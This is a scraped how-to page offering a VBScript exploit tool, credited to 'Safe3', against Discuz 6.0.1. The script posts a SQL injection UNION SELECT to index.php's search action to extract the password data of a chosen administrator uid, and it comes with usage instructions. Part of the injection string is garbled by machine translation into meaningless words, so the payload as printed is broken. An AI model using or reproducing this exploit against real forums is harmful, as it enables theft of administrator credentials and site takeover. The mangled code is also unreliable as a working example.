Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

How to use vbs to implement discuz arbitrary administrator password exploit tool

2025-04-12 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Share

Shulou(Shulou.com)06/03 Report--

Xiaobian to share with you how to use vbs to achieve discuz arbitrary administrator password vulnerability exploitation tool, I hope you will gain something after reading this article, let's discuss it together!

It is also conducive to modification.

The following is the VBS version of the search.inc.php file exploit code

The code is as follows:

Dim strUrl,strSite,strPath,strUid

ShowB ()

Set Args = Wscript.Arguments

If Args.Count 3 Then

ShowU ()

Else

StrSite=Args (0)

StrPath=Args (1)

StrUid=Args (2)

End If

StrUrl= "action=search&searchid=22%cf' UNION SELECT 1century passwordGram3reachpasswordGrams3reignedpasswordlemagecomplicationtheconsumptionCharacterizationcdbbadmembersplectionChargencedChargesAccording to strUrl=" passwordGramPasswordMagned3Permanent words = "& strUid &" / * & do=submit "

Set objXML = CreateObject ("Microsoft.XMLHTTP")

ObjXML.Open "POST", strSite & strPath & "index.php", False

ObjXML.SetRequestHeader "Accept", "* /"

ObjXML.SetRequestHeader "Accept-Language", "zh-cn"

ObjXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"

ObjXML.SetRequestHeader "User-Agent", "wap"

ObjXML.send (strUrl)

Wscript.echo (objXML.ResponseText)

Sub showB ()

With Wscript

.Echo ("+-- =--")

.Echo ("Exploit discuz6.0.1")

.Echo ("Code By Safe3")

.Echo ("+-- =--")

End with

End Sub

Sub showU ()

With Wscript

.Echo ("+-- =--")

.Echo ("usage:")

.Echo ("cscript" & .ScriptName & "site path uid")

.Echo ("example:")

.Echo ("cscript" & .ScriptName & "http://www.example.com/ / forum/ 1 > result.txt")

.Echo ("+-- =--")

.Quit

End with

End Sub

After reading this article, I believe you have a certain understanding of "how to use vbs to achieve password exploitation tools for any discuz administrator". If you want to know more about it, welcome to follow the industry information channel, thank you for your reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 261

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Vulnerabilities passwords tools administrators administration code articles examples done documents more knowledge industry information information channels channels vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple Linux MySQL Apple Redmi Shulou Tech Info NVidia Docker Huawei vpn Shulou Information Microsoft Xiaomi macOS MariaDB Shulou Technology OPPO Reno Linux MySQL Apple Redmi Shulou Tech Info NVidia Docker Huawei vpn Shulou Information Microsoft Xiaomi macOS MariaDB Shulou Technology OPPO Reno

Share To

Related

Development

More Development >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report